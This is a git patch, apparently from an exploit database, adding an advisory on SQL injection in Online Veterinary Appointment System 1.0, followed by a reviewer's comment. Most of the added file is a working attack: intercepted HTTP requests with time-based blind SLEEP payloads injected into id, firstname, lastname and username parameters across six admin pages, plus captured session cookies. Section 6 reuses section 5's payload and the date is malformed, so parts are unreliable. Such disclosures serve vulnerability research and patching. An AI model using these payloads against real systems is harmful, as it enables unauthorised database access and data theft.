From 76c02f99c367ba8e27b3c464d60371a149815161 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 8 Jan 2022 05:01:55 +0000
Subject: [PATCH] DB: 2022-01-08

1 changes to exploits/shellcodes

Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection
---
 exploits/php/webapps/50644.txt | 243 +++++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 244 insertions(+)
 create mode 100644 exploits/php/webapps/50644.txt

diff --git a/exploits/php/webapps/50644.txt b/exploits/php/webapps/50644.txt
new file mode 100644
index 000000000..e6148f748
--- /dev/null
+++ b/exploits/php/webapps/50644.txt
@@ -0,0 +1,243 @@
+# Exploit Title: Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection
+# Date: 05/01/20222
+# Exploit Author: twseptian
+# Vendor Homepage: https://www.sourcecodester.com/php/15119/online-veterinary-appointment-system-using-phpoop-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/ovas.zip
+# Version: v1.0
+# Tested on: Kali Linux 2021.4
+
+=====================================================================================================================================
+SQL Injection:
+=====================================================================================================================================
+SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Online Veterinary Appointment System 1.0 is vulnerable to 'Multiple' SQL injections.
+
+=====================================================================================================================================
+Attack Vector:
+=====================================================================================================================================
+An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.
+
+=====================================================================================================================================
+1. Appointment Requests - Vulnerable Parameter(s): id
+=====================================================================================================================================
+Steps of reproduce:
+Step-1: On the dashboard navigate to 'Appointment Requests' page using the following URL:
+
+http://localhost/ovas/admin/?page=appointments
+
+then go to 'Action' > 'View'.
+
+Step-2: Put the SQL Injection payloads in 'id' field.
+time-based blind payload : page=appointments/view_details&id=1' AND (SELECT 2197 FROM (SELECT(SLEEP(5)))DZwi) AND 'mQQq'='mQQq
+
+Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
+
+=====================================================================================================================================
+2. Inquiries - Vulnerable Parameter(s): id
+=====================================================================================================================================
+Steps of reproduce:
+Step-1: On the dashboard navigate to 'Inquiries' page using the following URL:
+
+http://localhost/ovas/admin/?page=inquiries
+
+then go to 'Action' > 'View'.
+
+Step-2: Let's intercept 'View' request using burpsuite:
+
+GET /ovas/admin/inquiries/view_details.php?id=1 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/ovas/admin/?page=inquiries
+Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+Put the SQL Injection payloads in 'id' field.
+time-based blind payload : /ovas/admin/inquiries/view_details.php?id=1' AND (SELECT 6051 FROM (SELECT(SLEEP(5)))DEds) AND 'SOxP'='SOxP
+
+Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
+
+=====================================================================================================================================
+3. My Account - Vulnerable Parameter(s): id,firstname,lastname,username
+=====================================================================================================================================
+Steps of reproduce:
+Step-1: On the dashboard navigate to 'My Account' page using the following URL:
+
+http://localhost/ovas/admin/?page=user
+
+Step-2: then let's intercept 'Update' request using burpsuite:
+
+POST /ovas/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------24959341351495697487735843118
+Content-Length: 796
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/ovas/admin/?page=user
+Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="id"
+
+4
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="firstname"
+
+user
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="lastname"
+
+user
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="username"
+
+user
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="password"
+
+
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------24959341351495697487735843118--
+
+Put the SQL Injection payloads in Vulnerable Parameter(s): id,firstname,lastname,username
+for example, the time-based blind payload in 'id':
+
+[SNIP]
+Content-Disposition: form-data; name="id"
+
+4 AND (SELECT 9713 FROM (SELECT(SLEEP(5)))YIam)
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="firstname"
+
+user
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="lastname"
+
+user
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="username"
+
+user
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="password"
+
+
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------24959341351495697487735843118--
+
+Step-3: If we use BurpSuite, click 'Send'. The server target accepted our payload, and the response got delayed by 5 seconds. The same thing for other parameters
+
+=====================================================================================================================================
+4. Category List - Vulnerable Parameter(s): id
+=====================================================================================================================================
+Steps of reproduce:
+Step-1: On the dashboard navigate to 'Category List ' page using the following URL:
+
+http://localhost/ovas/admin/?page=categories
+
+then go to 'Action' > 'Edit'
+
+Step-2: Let's intercept 'Edit' request using burpsuite:
+
+GET /ovas/admin/categories/manage_category.php?id=2 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/ovas/admin/?page=categories
+Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+Put the SQL Injection payloads in 'id' field.
+time-based blind payload : /ovas/admin/categories/manage_category.php?id=2' AND (SELECT 3851 FROM (SELECT(SLEEP(5)))UFXk) AND 'XbFb'='XbFb
+
+Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
+
+=====================================================================================================================================
+5. Service List - Vulnerable Parameter(s): id
+=====================================================================================================================================
+Steps of reproduce:
+Step-1: On the dashboard navigate to 'Service List ' page using the following URL:
+
+http://localhost/ovas/admin/?page=services
+
+then go to 'Action' > 'View'
+
+Step-2: Let's intercept 'View' request using burpsuite:
+
+GET /ovas/admin/services/view_service.php?id=4 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/ovas/admin/?page=services
+Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+Put the SQL Injection payloads in 'id' field.
+time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ
+
+Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
+
+=====================================================================================================================================
+6. Admin User List - Vulnerable Parameter(s): id
+=====================================================================================================================================
+Steps of reproduce:
+Step-1: On the dashboard navigate to 'Admin User List ' page using the following URL:
+
+http://localhost/ovas/admin/?page=user/list
+
+then go to 'Action' > 'Edit'
+
+Step-2: Let's intercept 'Edit' request using burpsuite:
+
+GET /ovas/admin/?page=user/manage_user&id=3 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://localhost/ovas/admin/?page=user/list
+Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+Put the SQL Injection payloads in 'id' field.
+time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ
+
+Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 78db1d768..65a7f6d0e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44723,3 +44723,4 @@ id,file,description,date,author,type,platform,port
 50637,exploits/php/webapps/50637.txt,"openSIS Student Information System 8.0 - 'multiple' SQL Injection",1970-01-01,securityforeveryone.com,webapps,php,
 50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",1970-01-01,"Oscar Gil Gutierrez",webapps,php,
 50643,exploits/php/webapps/50643.txt,"WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Andrea Bocchetti",webapps,php,
+50644,exploits/php/webapps/50644.txt,"Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection",1970-01-01,twseptian,webapps,php,
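Review bot: Every captured request in this file reproduces the tester's own `Cookie` header verbatim, including live session tokens (`PHPSESSID=...`, `Student_Management_System=...`) and column-preference cookies from an unrelated "superschool" application; those values add nothing to the proof of concept and should be replaced with a placeholder such as `Cookie: [REDACTED]` before publication. The `# Date: 05/01/20222` header has a five-digit year and presumably meant `05/01/2022`. Section 6 ("Admin User List") names the `manage_user` endpoint in its heading and captured request, but its "time-based blind payload" line is a verbatim copy of section 5's `view_service.php?id=4` request, so the section is internally inconsistent as written. The writeup also carries no remediation guidance; a single line noting that the listed `id`, `firstname`, `lastname` and `username` values must be passed to the database through prepared statements with bound parameters (and, for `id`, validated as an integer) would make the advisory actionable for the vendor and for anyone triaging it.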